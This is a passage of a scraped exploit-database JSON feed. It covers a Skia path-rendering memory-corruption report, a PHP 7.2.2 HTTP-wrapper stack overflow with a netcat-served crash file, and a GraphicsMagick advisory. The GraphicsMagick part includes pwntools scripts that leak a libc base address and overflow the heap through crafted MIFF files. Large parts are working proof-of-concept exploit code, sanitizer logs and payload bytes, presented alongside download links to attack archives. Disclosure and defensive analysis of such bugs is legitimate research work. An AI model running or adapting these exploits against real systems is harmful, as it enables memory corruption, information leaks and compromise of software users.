aaa_fill_path(SkPath const&, SkIRect const&, AdditiveBlitter*, int, int, bool, bool, bool) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/asan/../../src/core/SkScan_AAAPath.cpp:1669\r\n #6 0x1465fa4 in SkScan::AAAFillPath(SkPath const&, SkBlitter*, SkIRect const&, SkIRect const&, bool) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/asan/../../src/core/SkScan_AAAPath.cpp:1713\r\n #7 0xad5687 in SkScan::AntiFillPath(SkPath const&, SkRegion const&, SkBlitter*, bool, SkDAARecord*) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/asan/../../src/core/SkScan_AntiPath.cpp:844:9\r\n #8 0xad6cf6 in SkScan::AntiFillPath(SkPath const&, SkRasterClip const&, SkBlitter*, SkDAARecord*) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/asan/../../src/core/SkScan_AntiPath.cpp:883:9\r\n #9 0x9c5902 in SkDraw::drawDevPath(SkPath const&, SkPaint const&, bool, SkBlitter*, bool) const /usr/local/google/home/ifratric/p0/skia/skia20181029/out/asan/../../src/core/SkDraw.cpp:1018:5\r\n #10 0x9c64b9 in SkDraw::drawPath(SkPath const&, SkPaint const&, SkMatrix const*, bool, bool, SkBlitter*) const /usr/local/google/home/ifratric/p0/skia/skia20181029/out/asan/../../src/core/SkDraw.cpp:1101:11\r\n #11 0x13478f3 in SkDraw::drawPath(SkPath const&, SkPaint const&, SkMatrix const*, bool) const /usr/local/google/home/ifratric/p0/skia/skia20181029/out/asan/../../src/core/SkDraw.h:56:15\r\n #12 0x13478f3 in SkBitmapDevice::drawPath(SkPath const&, SkPaint const&, bool) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/asan/../../src/core/SkBitmapDevice.cpp:407\r\n #13 0x98e9ce in SkCanvas::onDrawPath(SkPath const&, SkPaint const&) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/asan/../../src/core/SkCanvas.cpp:2141:23\r\n #14 0x983f71 in SkCanvas::drawPath(SkPath const&, SkPaint const&) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/asan/../../src/core/SkCanvas.cpp:1694:11\r\n #15 0x69add0 in main /usr/local/google/home/ifratric/p0/skia/skia20181029/out/asan/../../example/SkiaSDLExample.cpp:63:10\r\n #16 0x7ff1044112b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0)\r\n #17 0x5ab0e9 in _start (/usr/local/google/home/ifratric/p0/skia/skia20181029/out/asan/SkiaSDLExample+0x5ab0e9)\r\n\r\nAddress 0x7ffc5c8950d4 is located in stack of thread T0 at offset 52 in frame\r\n #0 0xac421f in SkBlitter::blitAntiH2(int, int, unsigned int, unsigned int) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/asan/../../src/core/SkBlitter.h:87\r\n\r\n This frame has 2 object(s):\r\n [32, 38) 'runs'\r\n [64, 66) 'aa' <== Memory access at offset 52 underflows this variable\r\nHINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext\r\n (longjmp and C++ exceptions *are* supported)\r\nSUMMARY: AddressSanitizer: stack-buffer-overflow /usr/local/google/home/ifratric/p0/skia/skia20181029/out/asan/../../src/core/SkAntiRun.h:154:26 in SkAlphaRuns::Break(short*, unsigned char*, int, int)\r\nShadow bytes around the buggy address:\r\n 0x10000b90a9c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x10000b90a9d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x10000b90a9e0: 00 00 00 00 00 00 00 00 f1 f1 f1 f1 00 00 00 f2\r\n 0x10000b90a9f0: f2 f2 f2 f2 04 f2 04 f3 00 00 00 00 00 00 00 00\r\n 0x10000b90aa00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n=>0x10000b90aa10: 00 00 00 00 f1 f1 f1 f1 06 f2[f2]f2 02 f3 f3 f3\r\n 0x10000b90aa20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x10000b90aa30: f1 f1 f1 f1 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x10000b90aa40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x10000b90aa50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x10000b90aa60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\nShadow byte legend (one shadow byte represents 8 application bytes):\r\n Addressable: 00\r\n Partially addressable: 01 02 03 04 05 06 07 \r\n Heap left redzone: fa\r\n Freed heap region: fd\r\n Stack left redzone: f1\r\n Stack mid redzone: f2\r\n Stack right redzone: f3\r\n Stack after return: f5\r\n Stack use after scope: f8\r\n Global redzone: f9\r\n Global init order: f6\r\n Poisoned by user: f7\r\n Container overflow: fc\r\n Array cookie: ac\r\n Intra object redzone: bb\r\n ASan internal: fe\r\n Left alloca redzone: ca\r\n Right alloca redzone: cb\r\n==139872==ABORTING\r\n\r\n################################################################################\r\n\r\nAnother variant of this issue can be triggered while rendering a concave path with SkScan::SAAFillPath algorithm.\r\n\r\nWhen drawing a path with SkScan::SAAFillPath, if the path is concave but Skia thinks it's convex, this can lead to SuperBlitter::blitH without respecting the the top-to-bottom, left-to-right order. In this case, this leads to SkAlphaRuns::add also being called out-of-order, which leads to SkAlphaRuns::Break being called with a negative \"x\" argument, which leads to uninitialized memory being read here:\r\nhttps://cs.chromium.org/chromium/src/third_party/skia/src/core/SkAntiRun.h?g=0&l=150&rcl=c640d0dc96924699fdbb1a3cbdc907aa07b1cb3c\r\nWhich then leads to out-of-bounds reads/writes on the following lines:\r\nhttps://cs.chromium.org/chromium/src/third_party/skia/src/core/SkAntiRun.h?g=0&rcl=c640d0dc96924699fdbb1a3cbdc907aa07b1cb3c&l=154\r\nhttps://cs.chromium.org/chromium/src/third_party/skia/src/core/SkAntiRun.h?g=0&rcl=c640d0dc96924699fdbb1a3cbdc907aa07b1cb3c&l=155\r\n\r\nThis issue is also triggerable in Chrome by simply drawing a path to the canvas.\r\n\r\nSkia and Chrome PoCs are attached.\r\n\r\n\r\nMSan log from Skia:\r\n\r\n==55058==WARNING: MemorySanitizer: use-of-uninitialized-value\r\n #0 0xcb9188 in SkAlphaRuns::Break(short*, unsigned char*, int, int) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkAntiRun.h:155:17\r\n #1 0xcb9188 in SkAlphaRuns::add(int, unsigned int, int, unsigned int, unsigned int, int) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkAntiRun.h:83\r\n #2 0xcb9188 in SuperBlitter::blitH(int, int, int) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkScan_AntiPath.cpp:251\r\n #3 0xce2e0e in walk_convex_edges(SkEdge*, SkPath::FillType, SkBlitter*, int, int, void (*)(SkBlitter*, int, bool)) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkScan_Path.cpp:278:30\r\n #4 0xce0b79 in sk_fill_path(SkPath const&, SkIRect const&, SkBlitter*, int, int, int, bool) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkScan_Path.cpp:488:9\r\n #5 0xcbc6f3 in SkScan::SAAFillPath(SkPath const&, SkBlitter*, SkIRect const&, SkIRect const&, bool) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkScan_AntiPath.cpp:737:9\r\n #6 0xcbe0a2 in SkScan::AntiFillPath(SkPath const&, SkRegion const&, SkBlitter*, bool, SkDAARecord*) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkScan_AntiPath.cpp:852:9\r\n #7 0xb02720 in SkDraw::drawDevPath(SkPath const&, SkPaint const&, bool, SkBlitter*, bool) const /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkDraw.cpp:1018:5\r\n #8 0xb03efc in SkDraw::drawPath(SkPath const&, SkPaint const&, SkMatrix const*, bool, bool, SkBlitter*) const /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkDraw.cpp:1101:11\r\n #9 0x19efe03 in SkDraw::drawPath(SkPath const&, SkPaint const&, SkMatrix const*, bool) const /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkDraw.h:56:15\r\n #10 0x19efe03 in SkBitmapDevice::drawPath(SkPath const&, SkPaint const&, bool) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkBitmapDevice.cpp:407\r\n #11 0xab09cb in SkCanvas::onDrawPath(SkPath const&, SkPaint const&) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkCanvas.cpp:2141:23\r\n #12 0xaa0237 in SkCanvas::drawPath(SkPath const&, SkPaint const&) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkCanvas.cpp:1694:11\r\n #13 0x62077d in main /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../example/SkiaSDLExample.cpp:52:10\r\n #14 0x7f8901e5f2b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0)\r\n #15 0x5af729 in _start (/usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/SkiaSDLExample+0x5af729)\r\n\r\n Uninitialized value was created by a heap allocation\r\n #0 0x5b799c in __interceptor_malloc (/usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/SkiaSDLExample+0x5b799c)\r\n #1 0xdb06dd in sk_malloc_flags(unsigned long, unsigned int) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/ports/SkMemory_malloc.cpp:71:13\r\n #2 0xb0b9c7 in sk_malloc_throw(unsigned long) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../include/private/SkMalloc.h:59:12\r\n #3 0xb0b9c7 in SkAutoMalloc::reset(unsigned long, SkAutoMalloc::OnShrink) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkAutoMalloc.h:53\r\n #4 0xb0b9c7 in SkBlitter::allocBlitMemory(unsigned long) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkBlitter.h:137\r\n #5 0xcb6c9d in SuperBlitter::SuperBlitter(SkBlitter*, SkIRect const&, SkIRect const&, bool) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkScan_AntiPath.cpp:159:32\r\n #6 0xcbc648 in SkScan::SAAFillPath(SkPath const&, SkBlitter*, SkIRect const&, SkIRect const&, bool) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkScan_AntiPath.cpp:736:22\r\n #7 0xcbe0a2 in SkScan::AntiFillPath(SkPath const&, SkRegion const&, SkBlitter*, bool, SkDAARecord*) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkScan_AntiPath.cpp:852:9\r\n #8 0xb02720 in SkDraw::drawDevPath(SkPath const&, SkPaint const&, bool, SkBlitter*, bool) const /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkDraw.cpp:1018:5\r\n #9 0xb03efc in SkDraw::drawPath(SkPath const&, SkPaint const&, SkMatrix const*, bool, bool, SkBlitter*) const /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkDraw.cpp:1101:11\r\n #10 0x19efe03 in SkDraw::drawPath(SkPath const&, SkPaint const&, SkMatrix const*, bool) const /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkDraw.h:56:15\r\n #11 0x19efe03 in SkBitmapDevice::drawPath(SkPath const&, SkPaint const&, bool) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkBitmapDevice.cpp:407\r\n #12 0xab09cb in SkCanvas::onDrawPath(SkPath const&, SkPaint const&) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkCanvas.cpp:2141:23\r\n #13 0xaa0237 in SkCanvas::drawPath(SkPath const&, SkPaint const&) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkCanvas.cpp:1694:11\r\n #14 0x62077d in main /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../example/SkiaSDLExample.cpp:52:10\r\n #15 0x7f8901e5f2b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0)\r\n\r\n################################################################################\r\n\r\nA third variant of this, which is also exploitable in Chrome (I just linked to the ClusterFuzz testcase) is when a path is rendered SkScan::SAAFillPath with a MaskSuperBlitter. In this case, rendering concave path as convex leads to \"x\" coordinate being increased beyond the image bounds, which leads to incrementing out-of-bounds data in\r\nhttps://skia.googlesource.com/skia/+/fa7df23d8b0c4121adfc5ad45c295e7077fad3f5/src/core/SkScan_AntiPath.cpp#483\r\n\r\nNote: ptr normally points inside\r\nhttps://cs.chromium.org/chromium/src/third_party/skia/src/core/SkScan_AntiPath.cpp?type=cs&g=0&l=435&rcl=05caa69a3f5aa45fd230ec302e6da1522d993747\r\nwhich is (in this case) allocated on the stack, so this variant gives us a stack out-of-bounds increment by a chosen small value, which is a pretty nice exploitation primitive.\r\n\r\nPoCs for Skia and Chrome are attached.\r\n\r\n\r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46332.zip\n\n# 0day.today [2019-02-25] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/32141"}, {"lastseen": "2018-06-06T21:48:51", "bulletinFamily": "exploit", "description": "Exploit for php platform in category dos / poc", "modified": "2018-06-06T00:00:00", "published": "2018-06-06T00:00:00", "id": "1337DAY-ID-30541", "href": "https://0day.today/exploit/description/30541", "title": "PHP 7.2.2 - php_stream_url_wrap_http_ex Buffer Overflow Exploit", "type": "zdt", "sourceData": "Description:\r\n------------\r\nThe latest PHP distributions contain a memory corruption bug while parsing malformed HTTP response packets. Vulnerable code at:\r\n \r\nphp_stream_url_wrap_http_ex /home/weilei/php-7.2.2/ext/standard/http_fopen_wrapper.c:723\r\n \r\n if (tmp_line[tmp_line_len - 1] == '\\n') {\r\n --tmp_line_len;\r\n if (tmp_line[tmp_line_len - 1] == '\\r') {\r\n --tmp_line_len;\r\n }\r\n}\r\n \r\nIf the proceeding buffer contains '\\r' as either controlled content or junk on stack, under a realistic setting (non-ASAN), tmp_line_len could go do -1, resulting in an extra large string being copied subsequently. Under ASAN a segfault can be observed.\r\n \r\n$ bin/php --version\r\nPHP 7.2.2 (cli) (built: Feb 20 2018 08:51:24) ( NTS )\r\nCopyright (c) 1997-2018 The PHP Group\r\nZend Engine v3.2.0, Copyright (c) 1998-2018 Zend Technologies\r\n \r\n \r\nTest script:\r\n---------------\r\n$ xxd -g 1 poc\r\n0000000: 30 30 30 30 30 30 30 30 30 31 30 30 0a 0a 000000000100..\r\n \r\n$ nc -vvlp 8080 < poc\r\nListening on [0.0.0.0] (family 0, port 8080)\r\nConnection from [127.0.0.1] port 8080 [tcp/http-alt] accepted (family 2, sport 53083)\r\nGET / HTTP/1.0\r\nHost: localhost:8080\r\nConnection: close\r\n \r\n$ bin/php -r 'file_get_contents(\"http://localhost:8080\");'\r\n \r\nExpected result:\r\n----------------\r\nNO CRASH\r\n \r\nActual result:\r\n--------------\r\n$ bin/php -r 'file_get_contents(\"http://localhost:8080\");'\r\n=================================================================\r\n==26249== ERROR: AddressSanitizer: stack-buffer-overflow on address 0xbfc038ef at pc 0x8aa393b bp 0xbfc02eb8 sp 0xbfc02eac\r\nREAD of size 1 at 0xbfc038ef thread T0\r\n #0 0x8aa393a in php_stream_url_wrap_http_ex /home/weilei/php-7.2.2/ext/standard/http_fopen_wrapper.c:723\r\n #1 0x8aa61fb in php_stream_url_wrap_http /home/weilei/php-7.2.2/ext/standard/http_fopen_wrapper.c:979\r\n #2 0x8b8b115 in _php_stream_open_wrapper_ex /home/weilei/php-7.2.2/main/streams/streams.c:2027\r\n #3 0x8918dc0 in zif_file_get_contents /home/weilei/php-7.2.2/ext/standard/file.c:550\r\n #4 0x867993a in phar_file_get_contents /home/weilei/php-7.2.2/ext/phar/func_interceptors.c:224\r\n #5 0x91ee267 in ZEND_DO_ICALL_SPEC_RETVAL_UNUSED_HANDLER /home/weilei/php-7.2.2/Zend/zend_vm_execute.h:573\r\n #6 0x91ee267 in execute_ex /home/weilei/php-7.2.2/Zend/zend_vm_execute.h:59731\r\n #7 0x923c13c in zend_execute /home/weilei/php-7.2.2/Zend/zend_vm_execute.h:63760\r\n #8 0x8cba975 in zend_eval_stringl /home/weilei/php-7.2.2/Zend/zend_execute_API.c:1082\r\n #9 0x8cbaf66 in zend_eval_stringl_ex /home/weilei/php-7.2.2/Zend/zend_execute_API.c:1123\r\n #10 0x8cbb06b in zend_eval_string_ex /home/weilei/php-7.2.2/Zend/zend_execute_API.c:1134\r\n #11 0x9244455 in do_cli /home/weilei/php-7.2.2/sapi/cli/php_cli.c:1042\r\n #12 0x9246b37 in main /home/weilei/php-7.2.2/sapi/cli/php_cli.c:1404\r\n #13 0xb5e8ca82 (/lib/i386-linux-gnu/libc.so.6+0x19a82)\r\n #14 0x80656d0 in _start (/home/weilei/php7_asan/bin/php+0x80656d0)\r\nAddress 0xbfc038ef is located at offset 607 in frame <php_stream_url_wrap_http_ex> of T0's stack:\r\n This frame has 13 object(s):\r\n [32, 36) 'transport_string'\r\n [96, 100) 'errstr'\r\n [160, 164) 'http_header_line_length'\r\n [224, 232) 'timeout'\r\n [288, 296) 'req_buf'\r\n [352, 360) 'tmpstr'\r\n [416, 432) 'ssl_proxy_peer_name'\r\n [480, 496) 'http_header'\r\n [544, 576) 'buf'\r\n [608, 736) 'tmp_line'\r\n [768, 1792) 'location'\r\n [1824, 2848) 'new_path'\r\n [2880, 3904) 'loc_path'\r\nHINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext\r\n (longjmp and C++ exceptions *are* supported)\r\nSUMMARY: AddressSanitizer: stack-buffer-overflow /home/weilei/php-7.2.2/ext/standard/http_fopen_wrapper.c:723 php_stream_url_wrap_http_ex\r\nShadow bytes around the buggy address:\r\n 0x37f806c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x37f806d0: 00 00 f1 f1 f1 f1 04 f4 f4 f4 f2 f2 f2 f2 04 f4\r\n 0x37f806e0: f4 f4 f2 f2 f2 f2 04 f4 f4 f4 f2 f2 f2 f2 00 f4\r\n 0x37f806f0: f4 f4 f2 f2 f2 f2 00 f4 f4 f4 f2 f2 f2 f2 00 f4\r\n 0x37f80700: f4 f4 f2 f2 f2 f2 00 00 f4 f4 f2 f2 f2 f2 00 00\r\n=>0x37f80710: f4 f4 f2 f2 f2 f2 00 00 00 00 f2 f2 f2[f2]00 00\r\n 0x37f80720: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f2 f2\r\n 0x37f80730: f2 f2 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x37f80740: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x37f80750: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x37f80760: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\nShadow byte legend (one shadow byte represents 8 application bytes):\r\n Addressable: 00\r\n Partially addressable: 01 02 03 04 05 06 07 \r\n Heap left redzone: fa\r\n Heap righ redzone: fb\r\n Freed Heap region: fd\r\n Stack left redzone: f1\r\n Stack mid redzone: f2\r\n Stack right redzone: f3\r\n Stack partial redzone: f4\r\n Stack after return: f5\r\n Stack use after scope: f8\r\n Global redzone: f9\r\n Global init order: f6\r\n Poisoned by user: f7\r\n ASan internal: fe\r\n==26249== ABORTING\r\nAborted\n\n# 0day.today [2018-06-06] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/30541"}, {"lastseen": "2018-04-03T00:19:14", "bulletinFamily": "exploit", "description": "Exploit for multiple platform in category dos / poc", "modified": "2017-11-03T00:00:00", "published": "2017-11-03T00:00:00", "href": "https://0day.today/exploit/description/28948", "id": "1337DAY-ID-28948", "type": "zdt", "title": "GraphicsMagick - Memory Disclosure / Heap Overflow Exploit", "sourceData": "'''Vulnerabilities summary\r\nThe following advisory describes two (2) vulnerabilities found in GraphicsMagick.\r\n \r\nGraphicsMagick is \u201cThe swiss army knife of image processing. Comprised of 267K physical lines (according to David A. Wheeler\u2019s SLOCCount) of source code in the base package (or 1,225K including 3rd party libraries) it provides a robust and efficient collection of tools and libraries which support reading, writing, and manipulating an image in over 88 major formats including important formats like DPX, GIF, JPEG, JPEG-2000, PNG, PDF, PNM, and TIFF.\u201d\r\n \r\nThe vulnerabilities found are:\r\n \r\nMemory Information Disclosure\r\nHeap Overflow\r\nCredit\r\nAn independent security researchers, Jeremy Heng (@nn_amon) and Terry Chia (Ayrx), has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program\r\n \r\nVendor response\r\nThe vendor has released patches to address these vulnerabilities (15237:e4e1c2a581d8 and 15238:7292230dd18).\r\n \r\nFor more details: ftp://ftp.graphicsmagick.org/pub/GraphicsMagick/snapshots/ChangeLog.txt\r\n \r\n \r\nVulnerabilities details\r\n \r\nMemory Information Disclosure\r\nGraphicsMagick is vulnerable to a memory information disclosure vulnerability found in DescribeImage function of the magick/describe.c file.\r\n \r\nThe portion of the code containing the vulnerability responsible of printing the IPTC Profile information contained in the image.\r\n \r\nThis vulnerability can be triggered with a specially crafted MIFF file.\r\n \r\nThe code which triggers the vulnerable code path is:\r\n \r\n63 MagickExport MagickPassFail DescribeImage(Image *image,FILE *file,\r\n64 const MagickBool verbose)\r\n65 {\r\n...\r\n660 for (i=0; i < profile_length; )\r\n661 {\r\n662 if (profile[i] != 0x1c)\r\n663 {\r\n664 i++;\r\n665 continue;\r\n666 }\r\n667 i++; /* skip file separator */\r\n668 i++; /* skip record number */\r\n...\r\n725 i++;\r\n726 (void) fprintf(file,\" %.1024s:\\n\",tag);\r\n727 length=profile[i++] << 8;\r\n728 length|=profile[i++];\r\n729 text=MagickAllocateMemory(char *,length+1);\r\n730 if (text != (char *) NULL)\r\n731 {\r\n732 char\r\n733 **textlist;\r\n734\r\n735 register unsigned long\r\n736 j;\r\n737\r\n738 (void) strncpy(text,(char *) profile+i,length);\r\n739 text[length]='\\0';\r\n740 textlist=StringToList(text);\r\n741 if (textlist != (char **) NULL)\r\n742 {\r\n743 for (j=0; textlist[j] != (char *) NULL; j++)\r\n744 {\r\n745 (void) fprintf(file,\" %s\\n\",textlist[j]);\r\n...\r\n752 i+=length;\r\n753 }\r\n \r\n \r\nThe value in profile_length variable is set in the following field in the MIFF header: profile-iptc=8\r\n \r\nThere is an out-of-bounds buffer dereference whenever profile[i] is accessed because the increments of i is never checked.\r\n \r\nIf we break on line 738 of describe.c, we can explore what is present on the heap during the strncpy operation.\r\n \r\n \r\ngef\u27a4 x/2xg profile\r\n0x8be210: 0x08000a001c414141 0x00007ffff690fba8\r\n \r\n \r\nThe 8 bytes 0x08000a001c414141 is the profile payload present in the specially crafted MIFF file.\r\n \r\n \r\n41 41 41 - padding\r\n1C - sentinel check in line 662\r\n00 - padding\r\n0A - \"Priority\" tag\r\n08 00 - 8 in big endian, the length\r\n \r\n \r\nIf we examine the value 0x00007ffff690fba8 adjacent to the payload, it becomes apparent that it is an address within the main_arena struct in libc.\r\n \r\n \r\ngef\u27a4 x/xw 0x00007ffff690fba8\r\n0x7ffff690fba8 <main_arena+136>: 0x008cdc40\r\ngef\u27a4 vmmap libc\r\nStart End Offset Perm Path\r\n0x00007ffff654b000 0x00007ffff670b000 0x0000000000000000 r-x\r\n/lib/x86_64-linux-gnu/libc-2.23.so\r\n0x00007ffff670b000 0x00007ffff690b000 0x00000000001c0000 ---\r\n/lib/x86_64-linux-gnu/libc-2.23.so\r\n0x00007ffff690b000 0x00007ffff690f000 0x00000000001c0000 r--\r\n/lib/x86_64-linux-gnu/libc-2.23.so\r\n0x00007ffff690f000 0x00007ffff6911000 0x00000000001c4000 rw-\r\n/lib/x86_64-linux-gnu/libc-2.23.so\r\n \r\nNow we can calculate the offset to libc base \u2013 0x3c4b98\r\n \r\nProof of Concept\r\n \r\n$ python miff/readexploit.py\r\n[+] Starting local process \u2018/usr/bin/gm\u2019: pid 20019\r\n[+] Receiving all data: Done (1.27KB)\r\n[*] Process \u2018/usr/bin/gm\u2019 stopped with exit code 0 (pid 20019)\r\n[*] Main Arena Leak: 0x7f72948adb98\r\n[*] libc Base: 0x7f72944e9000\r\n \r\n#!/usr/bin/python\r\n# GraphicsMagick IPTC Profile libc Leak\r\n \r\nfrom pwn import *\r\n \r\ndirectory = \"DIR\"\r\npartitions = ('id=ImageMagick version=1.0\\nclass=DirectClass matte=False\\n' +\r\n 'columns=1 rows=1 depth=16\\nscene=1\\nmontage=1x1+0+0\\nprofil' +\r\n 'e-iptc=',\r\n '\\n\\x0c\\n:\\x1a',\r\n '\\n\\x00',\r\n '\\n\\x00\\xbe\\xbe\\xbe\\xbe\\xbe\\xbe\\n')\r\noutput = \"readexploit.miff\"\r\nlength = 8\r\n \r\n#libc_main_arena_entry_offset = 0x3c4ba8\r\nlibc_main_arena_entry_offset = 0x3c4b98\r\n \r\ndef main():\r\n data = \"AAA\" + \"\\x1c\" + \"\\x00\" + chr(10) + p16(0x8, endian=\"big\")\r\n header = partitions[0] + str(length) + partitions[1]\r\n payload = header + directory + partitions[2] + data + partitions[3]\r\n file(output, \"w\").write(payload)\r\n \r\n p = process(executable=\"gm\", argv=[\"identify\", \"-verbose\", output])\r\n output_leak = p.recvall()\r\n priority_offset = output_leak.index(\"Priority:\") + 12\r\n montage_offset = output_leak.index(\"Montage:\") - 3\r\n leak = output_leak[priority_offset:montage_offset]\r\n if \"0x00000000\" in leak:\r\n log.info(\"Unlucky run. Value corrupted by StringToList\")\r\n exit()\r\n main_arena_leak = u64(leak.ljust(8, \"\\x00\"))\r\n log.info(\"Main Arena Leak: 0x%x\" % main_arena_leak)\r\n libc_base = main_arena_leak - libc_main_arena_entry_offset\r\n log.info(\"libc Base: 0x%x\" % libc_base)\r\n \r\nif __name__ == \"__main__\":\r\n main()\r\n \r\n \r\nHeap Overflow\r\nGraphicsMagick is vulnerable to a heap overflow vulnerability found in DescribeImage() function of the magick/describe.c file.\r\n \r\nThe call to strncpy on line 855 does not limit the size to be copied to the size of the buffer copied to. Instead, the size is calculated by searching for a newline or a null byte in the directory name.\r\n \r\n844 /*\r\n845 Display visual image directory.\r\n846 */\r\n847 image_info=CloneImageInfo((ImageInfo *) NULL);\r\n848 (void) CloneString(&image_info->size,\"64x64\");\r\n849 (void) fprintf(file,\" Directory:\\n\");\r\n850 for (p=image->directory; *p != '\\0'; p++)\r\n851 {\r\n852 q=p;\r\n853 while ((*q != '\\n') && (*q != '\\0'))\r\n854 q++;\r\n855 (void) strncpy(image_info->filename,p,q-p);\r\n856 image_info->filename[q-p]='\\0';\r\n857 p=q;\r\n...\r\n880 }\r\n881 DestroyImageInfo(image_info);\r\n \r\nSince the field filename in the ImageInfo struct has the static size of 2053, the heap can be corrupted by forging an overly long directory name.\r\n \r\n \r\ntype = struct _ImageInfo {\r\n...\r\n FILE *file;\r\n char magick[2053];\r\n char filename[2053];\r\n _CacheInfoPtr_ cache;\r\n void *definitions;\r\n Image *attributes;\r\n unsigned int ping;\r\n PreviewType preview_type;\r\n unsigned int affirm;\r\n _BlobInfoPtr_ blob;\r\n size_t length;\r\n char unique[2053];\r\n char zero[2053];\r\n unsigned long signature;\r\n}\r\n \r\nOne possible way to trigger the vulnerability is to run the identify command on a specially crafted MIFF format file with the verbose flag.\r\n \r\nProof of Concept\r\nThe following proof of concept script will generate a specially crafted MIFF file exploit.miff.\r\n'''\r\n \r\n#!/usr/bin/python\r\n \r\nfrom pwn import *\r\n \r\npartitions = ('id=ImageMagick version=1.0\\nclass=DirectClass matte=False\\n' +\r\n 'columns=1 rows=1 depth=16\\nscene=1\\nmontage=1x1+0+0\\n\\x0c\\n' +\r\n ':\\x1a',\r\n '\\n\\x00\\xbe\\xbe\\xbe\\xbe\\xbe\\xbe\\n')\r\noutput = \"exploit.miff\"\r\n \r\ndef main():\r\n payload = \"A\"*10000\r\n payload = partitions[0] + payload + partitions[1]\r\n file(output, \"w\").write(payload)\r\n \r\nif __name__ == \"__main__\":\r\n main()\r\n \r\n''' \r\nRunning the GraphicsMagick gm utility with the arguments identify -verbose in GDB and breaking after the vulnerable strncpy call, and examining the corrupted ImageInfo object demonstrates that the heap corruption was successful.\r\n \r\n \r\ngef\u27a4 r identify -verbose exploit.miff\r\n...\r\ngef\u27a4 br describe.c:856\r\nBreakpoint 1 at 0x4571df: file magick/describe.c, line 856.\r\n...\r\ngef\u27a4 p *image_info\r\n$3 = {\r\n...\r\n compression = UndefinedCompression,\r\n file = 0x0,\r\n magick = '\\000' <repeats 2052 times>,\r\n filename = 'A' <repeats 2053 times>,\r\n cache = 0x4141414141414141,\r\n definitions = 0x4141414141414141,\r\n attributes = 0x4141414141414141,\r\n ping = 0x41414141,\r\n preview_type = 1094795585,\r\n affirm = 0x41414141,\r\n blob = 0x4141414141414141,\r\n length = 0x4141414141414141,\r\n unique = 'A' <repeats 2053 times>,\r\n zero = 'A' <repeats 2053 times>,\r\n signature = 0x4141414141414141\r\n}\r\n'''\n\n# 0day.today [2018-04-02] #", "sourceHref": "https://0day.today/exploit/28948", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, 